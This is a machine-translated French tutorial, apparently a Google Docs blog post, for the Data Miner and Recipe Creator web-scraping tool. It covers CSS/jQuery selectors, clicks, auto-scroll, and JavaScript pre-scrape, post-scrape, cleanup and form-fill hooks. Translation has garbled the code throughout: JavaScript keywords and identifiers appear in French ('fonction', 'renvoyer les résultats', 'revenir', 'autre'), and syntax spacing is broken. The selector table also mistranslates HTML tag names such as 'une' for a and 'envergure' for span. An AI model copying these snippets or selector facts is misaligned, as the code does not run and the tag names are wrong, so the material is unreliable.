  11. Les recettes seront sauvegardées les unes sur les autres à moins que vous ne commenciez une nouvelle recette. Commencez nouveau en cliquant sur le bouton Nouvelle recette dans l'onglet Enregistrer.


Comment utiliser les sélecteurs et actions avancés de Recipe Creator:

Dans cette section, vous comprendrez comment effectuer des sélecteurs plus avancés et utiliser les actions du créateur de recettes comme le clic sur le bouton et le défilement automatique.

Regardez le didacticiel Nav et Actions


Regardez l'outil de recherche et les didacticiels sur les sélecteurs


 Vous avez encore des questions?

Contactez-nous: [email protected]

Comment cliquer sur un bouton:

* Un clic sur le bouton peut être appliqué à tout moment pendant la création de la recette.

  1. Avec Recipe Creator ouvert aux actions, survolez et déplacez le bouton.
  2. Sélectionnez la classe la plus appropriée du bouton.
  3. Donnez-lui un temps d'attente d'au moins 3 secondes - cela donne au contenu le temps de se charger.
  4. Cliquez sur "Test Click"
  5. Une fois que le test révèle le contenu, survolez et déplacez le contenu comme d'habitude.
  6. Enregistrer, fermer et gratter :)

Comment faire défiler automatiquement:

* Le défilement automatique peut être appliqué à tout moment pendant la création de la recette.

  1. Avec Recipe Creator ouvert sur l'onglet Actions
  2. Sous "Exemples de Javascript", sélectionnez: Naviguer jusqu'à la fin de la page.
  3. Enregistrer, fermer et gratter :)

Comment faire défiler l'infini avec un clic:

* Le défilement infini avec clic peut être appliqué à tout moment pendant la création de la recette.

  1. Avec Recipe Creator ouvert aux actions, survolez et déplacez le bouton Charger plus.
  2. Sélectionnez la classe la plus appropriée du bouton.
  3. Donnez-lui un nombre de clics - ce sera le nombre de pages supplémentaires qu'il charge.
  4. Cliquez sur "Test Click"
  5. Enregistrer, fermer et gratter :)


Trucs, astuces et scénarios du sélecteur de recettes:

Sélecteurs de base

Type de sélecteur

Exemple

Sens

marque

h1

Les balises h sont généralement des en-têtes et affichent des informations importantes. les balises h vont de h1 à h6

marque

p

Les balises p sont utilisées pour le texte et les paragraphes de base.

marque

une

une balise est utilisée pour les liens. Les liens sont importants pour la pagination et pour obtenir des URL à partir des pages de recherche.

marque

img

les balises img sont utilisées pour les images. Recipe Creator doit avoir le menu déroulant "Extraire les données" sélectionné sur "URL de l'image" pour que les données soient correctement grattées.

classe

.adresse

Les classes sont suggérées par Recipe Creator lorsqu'elles sont disponibles et sont utilisées pour sélectionner un élément. Ils sont indiqués par un point dans le sélecteur jquery.

id

#email

les identifiants sont similaires aux classes, mais sont plus spécifiques. Ils sont indiqués par un signe numérique.

marque

div

les balises div sont généralement des conteneurs. Ils peuvent être utilisés pour le style, l'affichage d'informations génériques ou l'organisation d'informations.

marque

envergure

les balises span sont généralement utilisées pour du texte ou des icônes simples.

marque

fort

des balises fortes sont utilisées pour le style et contiennent du texte.


Sélecteurs avancés et combinaisons de sélecteurs

Sélecteurs

Exemple

Sens

(Espace)

.industrie forte

Séparez les sélecteurs par un espace pour parcourir les éléments.

,

h2, p

Les virgules combinent les éléments en une seule colonne. Ainsi, les données de balise h2 et les données de balise p seront dans la même colonne.

~

durée ~

Sélectionne tous les éléments suivants tant qu'ils ont tous le même parent ou conteneur.

+

span +

Sélectionne l'élément suivant tant qu'ils ont la même balise parent ou le même conteneur.

: contient ("")

div: contains ("Email")

Recipe Creator trouvera le mot entre guillemets pour n'importe quelle balise div de la page et le sélectionnera.

:première

h2: premier

Recipe Creator trouvera toujours la première balise h2 sur la page et la sélectionnera.

:dernier

h2: dernier

Recipe Creator trouvera toujours la dernière balise h2 sur la page et la sélectionnera.

: eq ()

h2: eq (2)

Recipe Creator trouvera toujours la deuxième balise h2 sur la page et la sélectionnera. Recipe Creator peut trouver n'importe quel nombre tant qu'il y en a autant sur la page. (Utilisez eq () uniquement lorsque la numérotation sera cohérente entre les pages)

:a(" ")

div: has ("p.address")

Recipe Creator trouvera toutes les divs qui ont la balise p et la classe d'adresse. Combinez avec: eq () pour spécifier quelle div.

[selector = "value"]

[itemdrop = "adresse"]

Lorsque les classes ou les balises ne sont pas disponibles mais que les sites ont des attributs alternatifs dans le HTML. Utilisez-les entre crochets pour vos sélecteurs.

étiquette de classe

.adresse

Lorsque le conteneur parent a la classe, mais que vous avez besoin de données à l'intérieur d'un élément enfant. Sélectionnez la classe suggérée du parent, puis tapez la balise contenant les données avec un espace entre les deux,



Fonctionnalités à venir dans Recipe Creator.

  • Séparation des données dans différentes colonnes. Exemple: prénom et nom.
  • Défilement infini pour la pagination. Exemple: Scraping sites qui chargent plus de résultats lorsque vous faites défiler vers le bas plutôt que de cliquer sur le bouton suivant.

  **********************************

Extraits Javascript

En utilisant Javascript, vous pouvez nettoyer vos résultats récupérés et effectuer une extraction de données plus sophistiquée que ce qui est possible avec seulement les sélecteurs de créateurs de recettes et xPath. Data Miner transmettra les données récupérées à une fonction javascript que vous fournissez. Vous pouvez ensuite modifier les données et les transmettre à Data Miner pour les enregistrer dans votre collection de données.

Avec Javascript personnalisé, vous pouvez:

  • Extraire les adresses e-mail du texte
  • Supprimer le texte indésirable des données grattées
  • Changer le type de devise, changer les unités.
  • Séparer ou joindre des données de colonne

A) Nettoyez les données grattées avec Javascript:


nettoyage js


Exemple de script de nettoyage des données:

        var cleanup = fonction (résultats) {

          // parcourir chaque ligne de résultats et modifier chaque colonne

          // débogueur;

          $ .each (résultats, fonction () {

            this.values ​​[0] = "xxxx -" + this.values ​​[0];

            this.values ​​[1] = this.values ​​[1] + "- yyyyy";

          });

          renvoyer les résultats; // retourne les résultats modifiés

        };

                       


B) Cliquez sur les éléments avant de gratter


crochets js


Vous pouvez fournir votre propre fonction en Javascript que Data Miner exécutera avant de supprimer les données. Les extraits de pré et post grattage vous donnent un pouvoir incroyable pour effectuer n'importe quel travail avant ou après le grattage.

Exemples de la façon dont les extraits pré et post peuvent vous aider:

  • Avec Pre-Scrape, vous pouvez attendre qu'un élément soit présent sur la page avant de démarrer le processus de scrape.
  • Avec Pre-Scrape, vous pouvez remplir un et soumettre avant de gratter la page.
  • Avec Pre-Scrape, vous pouvez cliquer sur un élément de la page ou faire des appels AJAX.
  • Avec Post-Scrape, vous pouvez nettoyer vos données. Ou cliquez sur un bouton.

C) Remplir des formulaires avec Javascript:


Page de recherche de grattage


       var workflow = {

            paginationType: "ajax",

            fillForm: fonction (contexte, résolution) {

                console.log ("démarrage du hook POST");

                if (! context.inputData)

                    context.inputData = {

                        nom: "pizza",

                    };

                revenir [{

                    tapez: "texte",

                    sélecteur: "input [name $ = 'find_desc']",

                    valeur: context.inputData.name,

                    waitAfter: 1

                }, {

                    tapez: "bouton",

                    sélecteur: ".main-search_submit",

                    done: fonction () {

                        résoudre();

                    }

                }];

            }

        };            


Avec Data Miner, vous pouvez remplir automatiquement des formulaires en téléchargeant un CSV contenant l'URL des formulaires et vos valeurs dans vos collections et en utilisant une recette de remplissage de formulaire. Pour créer une recette de remplissage de formulaire, vous devez inclure l'extrait Javascript et mettre à jour les sélecteurs aux bons attributs pour votre site. De plus, assurez-vous que les titres des colonnes CSV correspondent exactement aux titres des clés javascript (par exemple, le prénom Allen a la clé "first").

Une fois la recette terminée, exécutez un travail avec le CSV comme collection source et votre nouvelle recette de remplissage de formulaire comme recette. Le Job visitera le formulaire, injectera les valeurs puis grattera les résultats. Accumulation des données dans le fichier de sortie Data Collections.


Voir encore plus d'exemples de coup d'extraits Javascript:

        / * ------------------------------------------------ -------------------------------------------------- ------------------

        Voici un exemple de crochet pré-raclage. Dans cet exemple, un élément est trouvé à l'aide du sélecteur jquery ".tsd_name> a".

        Ensuite, l'élément est cliqué. Ensuite, nous attendons 2 secondes pour que la page change, puis nous demandons à Data Miner de continuer

        pour gratter la page.

        * /

        var workflow = {

            "preScrape": fonction (demande, rappel) {

                console.log ("démarrage du crochet de pré-raclage");

                var $ el = $ (". tsd_name> a"); // Élément sur lequel cliquer.

                var waitTime = 2; // Attendez n secondes et continuez à gratter la page

                if ($ el.length> 0) {

                    $ el [0] .click ()

                }

                setTimeout (fonction () {

                    rappeler();

                }, waitTime * 1000);

            }

        }

        / * ------------------------------------------------ -------------------------------------------------- ------------------

        Voici un autre exemple de crochet pré-raclage. Dans cet exemple, le crochet de pré-raclage attendra 5 secondes

        l'élément spécifié par le sélecteur jquery #footer apparaît sur la page. Dans une boucle, nous testons la présence de #footer et

        sinon, nous attendons 1 seconde et répétons la boucle. Une fois l'élément trouvé, nous appelons CallBack qui transfère

        le contrôle revient à Data Miner pour continuer à gratter.

        * /

        var workflow = {

            / * ------------------------------------------------ --------------

            Fonction preScrape:

                Sera exécuté avant tout raclage. Doit callBack pour rendre le contrôle d'exécution à Data Miner

            Contribution:

                demande: contexte de la demande. URL, grattage, paramètre etc.

                callBack: fonction de rappel à appeler lorsque tout le travail de pré-grattage est terminé.

            Revenir:

                rien

            -------------------------------------------------- ----------- * /

            "preScrape": fonction (demande, rappel) {

                console.log ("démarrage du crochet de pré-raclage");

                // débogueur;

                var condition = "#footer"; // Attendre la présence de cet élément avant de racler

                loopCounterMax = 5; // Nombre maximum de secondes à attendre avant d'abandonner

                var wait = fonction () {

                    var $ test = $ (condition);

                    if ($ test.length> 0 || loopCounter> loopCounterMax) {

                        if (callBack)

                            rappeler(); // Doit être appelé à la fin lorsque tout le travail PreScrape est terminé

                    } autre {

                        loopCounter ++;

                        setTimeout (attendre, 1000);

                    }

                };

                loopCounter = 0;

                attendre();

            },

        }

        / * ------------------------------------------------ -------------------------------------------------- ------------------

        Voici un autre exemple de crochet post-grattage. Dans cet exemple, les données qui ont été extraites de la page dans

        former sur un tableau. Vous pouvez ensuite modifier le résultat et renvoyer le tableau à Data Miner.

        * /

        var workflow = {

            / * ------------------------------------------------ --------------

            Fonction postScrape:

                Sera exécuté une fois le grattage terminé. Vous obtiendrez les résultats grattés et pourrez

                les nettoyer ou les modifier

            Contribution:

                résultats: tableau de données gratté

            Revenir:

                résultats: tableau de données modifié

            -------------------------------------------------- ----------- * /

            "postScrape": fonction (résultats) {

                console.log ("démarrage du crochet post-raclage");

              // parcourir chaque ligne de résultats et modifier chaque colonne

              // débogueur;

              $ .each (résultats, fonction () {

                this.values ​​[0] = "xxxx -" + this.values ​​[0];

                this.values ​​[1] = this.values ​​[1] + "- yyyyy";

              });

              renvoyer les résultats; // retourne les résultats modifiés

            },

        / * ------------------------------------------------ -------------------------------------------------- ------------------

        Voici un exemple de crochet à gratter. Vous pouvez simplement remplacer la fonctionnalité de raclage de Data Miner en vous fournissant

        fonction de raclage qui sera appelée à la place de la fonction de raclage de Data Miner.

        * /

        var workflow = {

            / * ------------------------------------------------ --------------

            fonction de raclage:

                Sera exécuté à la place de la fonction de scrape par défaut [originalScrape] de Data Miner.

                Les xpath dans l'interface utilisateur de Data Miner seront ignorés. Cependant, le nombre de colonnes de données retournées

                doit correspondre au nombre de colonnes spécifié dans l'interface utilisateur.

            Contribution:

                demande: contexte de la demande. URL, grattage, paramètre etc.

                originalScrape: la fonction de raclage par défaut de Data Miner.

                callBack: fonction de rappel pour renvoyer les résultats.

            Revenir:

                résultats: tableau de données modifié

            -------------------------------------------------- ----------- * /

            "scrape": fonction (request, originalScrape, callBack) {

                console.log ("démarrage du crochet de raclage");

                résultat var = [];

                result.push ({

                    "valeurs": [

                        "1234", "1234"

                    ]

                });

                callBack (résultats);

            }

        };

         / * ------------------------------------------------ --------------

        Pour fractionner les noms (fractionne par un espace)

        Utiliser le nettoyage

        -------------------------------------------------- ----------- * /

        var cleanup = fonction (résultats) {

            // débogueur;

            $ .each (résultats, fonction () {

                var x = this.values ​​[2] .indexOf ("");

                this.values ​​[2] = this.values ​​[2] .substring (0, x);

                this.values ​​[3] = this.values ​​[3] .substring (x, this.values ​​[3] .length);

            });

            renvoyer les résultats; // retourne les résultats modifiés

        };

         / * ------------------------------------------------ --------------

        Fractionner les noms par espace et sont au format "Last, First", supprime également la virgule,

        -------------------------------------------------- ------------ * /

            var cleanup = fonction (résultats) {

                // débogueur;

                $ .each (résultats, fonction () {

                    var x = this.values ​​[1] .indexOf ("");

                    var y = this.values ​​[1] .indexOf (",");

                    this.values ​​[1] = this.values ​​[1] .substring (x, this.values ​​[2] .length);

                    this.values ​​[2] = this.values ​​[2] .substring (0, y);

                    console.log (x);

                });

                renvoyer les résultats; // retourne les résultats modifiés

            };

         / * ------------------------------------------------ --------------

        Remplacez tout caractère non alphanumérique par un «-»

        -------------------------------------------------- ------------ * /

            var cleanup = fonction (résultats) {

                // débogueur;

                $ .each (résultats, fonction () {

                    this.values ​​[1] = this.values ​​[1] .replace (/ [^ a-z0-9 () _] / gi, '-');

                });

                renvoyer les résultats; // retourne les résultats modifiés

            };

         / * ------------------------------------------------ --------------

        Cliquez sur un bouton

        -------------------------------------------------- ------------ * /

        var workflow = {

            "preScrape": fonction (demande, rappel) {

                console.log ("démarrage du crochet de pré-raclage");

                var condition = "a [class ~ = 'xxxx']";

                var $ test = $ (condition);

                if ($ test.length> 0) {

                    $ test [0] .click ();

                    var wait = fonction () {

                        rappeler();

                    };

                    setTimeout (attendre, 3000);

                } else callBack ();

                renvoyer les résultats;

            }

        };

        / * ------------------------------------------------ --------------

        Cliquez et fermez le bouton

        -------------------------------------------------- ------------ * /

        var workflow = {

            "preScrape": fonction (demande, rappel) {

                console.log ("démarrage du crochet de pré-raclage");

                // débogueur;

                var condition = "button [data-lira-action ~ = 'edit-contact-info'"; // Attendre la présence de cet élément avant de racler

                // débogueur

                var $ test = $ (condition);

                if ($ test.length> 0) {

                    $ test [0] .click ();

                    var wait = fonction () {

                        rappeler();

                    };

                    setTimeout (attendre, 3000);

                } else callBack ();

            },

            "postScrape": fonction (résultats) {

                console.log ("démarrage du crochet post-raclage");

                var $ close = $ (". dialogue-close");

                if ($ close.length> 0) {

                    $ close [0] .click ();

                }

                renvoyer les résultats;

            }

        };

        / * ------------------------------------------------ --------------

        Filtrer les résultats de Data Miner

         -------------------------------------------------- ------------ * /

        var workflow = {

            "postScrape": fonction (résultats) {

                console.log ("démarrage du crochet post-raclage");

                // parcourir chaque ligne de résultats et modifier chaque colonne

                // débogueur;

                var results2 = [];

                $ .each (résultats, fonction () {

                    if (this.values ​​[2]! == "banana") // filtre les valeurs de la colonne 2 et exclut "banana"

                        results2.push (this);

                });

                return results2; // retourne les résultats modifiés

            }

        };

        / * ------------------------------------------------ --------------

        Défilement automatique avec un intervalle et un max (twitter)

         -------------------------------------------------- ------------ * /

        var workflow = {

            "preScrape": fonction (demande, rappel) {

                console.log ("démarrage du crochet de pré-raclage");

                // débogueur;

                var waitTime = 3000; // millisecondes

                var maxLoopCount = 50;

                nombre de var = 0;

                var loopCount = 0;

                boucle de fonction () {

                    loopCount ++;

                    if ($ ("li [class ~ = 'stream-item']"). length! == count && loopCount <maxLoopCount) {

                        window.scrollTo (0, document.body.scrollHeight);

                        count = $ ("li [class ~ = 'stream-item']"). length;

                    } else if (callBack) callBack ();

                }

                var tid = setInterval (boucle, waitTime);

            }

        };

        / * ------------------------------------------------ --------------

        Isoler les données par index

         -------------------------------------------------- ------------ * /

        var cleanup = fonction (résultats) {

            // débogueur;

            $ .each (résultats, fonction () {

                this.values ​​[3] = this.values ​​[3] .substring (0, 13);

                this.values ​​[4] = this.values ​​[4] .substring (14, 30);

            });

            renvoyer les résultats; // retourne les résultats modifiés

        };

        / * ------------------------------------------------ --------------

        Utilisation du remplissage de formulaires avec des menus déroulants. Le javascript suivant cliquera pour ouvrir un formulaire,

        cliquez sur un menu déroulant, sélectionnez un élément dans la liste, puis cliquez sur soumettre.

        Un CVS avec une colonne intitulée "emplacement", puis des données en dessous de 0 à travers le nombre d'éléments dans le menu déroulant

        peut être injecté dans un sélecteur vous permettant de sélectionner différents éléments dans une liste déroulante et de les rechercher, lors de l'injection

        le texte de base ne fonctionne pas.

         -------------------------------------------------- ------------ * /

        var workflow = {

            paginationType: "ajax",

            fillForm: fonction (contexte, résolution) {

                console.log ("démarrage du hook POST");

                if (! context.inputData)

                    context.inputData = {

                        location: "0", // à partir de 0, l'emplacement correspond à l'emplacement de l'élément dans la liste déroulante.

                    };

                revenir [{

                    tapez: "bouton",

                    sélecteur: "a [class ~ = 'XXXX']", // bouton de sélection ouvert

                    waitAfter: 2

                }, {

                    tapez: "bouton",

                    sélecteur: "* [class ~ = 'XXXX']", // sélecteur de bouton de formulaire

                    waitAfter: 2

                }, {

                    tapez: "bouton",

                    sélecteur: "* [id ~ = 'XXXX" + context.inputData.location + "']", //inputData.location est le nombre défini ci-dessus ou

                            injecté à partir du CSV, puis ajouté au sélecteur d'élément déroulant.

                    waitAfter: 2

                }, {

                    tapez: "bouton",

                    sélecteur: "bouton [nom ~ = 'skipandexplore']", // soumettre le sélecteur de bouton

                    done: fonction () {

                        résoudre();

                    }

                }];

            }

        };

                   


 Obtenez la version 1.0 de Data Miner

Remarque: Nous vous recommandons d'exécuter la version de production et les versions 1.0 côte à côte. Si vous rencontrez un problème de blocage dans l'une ou l'autre version, faites-le nous savoir. Mais chaque version s'exécute indépendamment et elles n'interfèrent pas les unes avec les autres.

Téléchargez la version Data Miner 1.0 .



This blog post is actually just a Google Doc! Create your own blog with Google Docs, in less than a minute.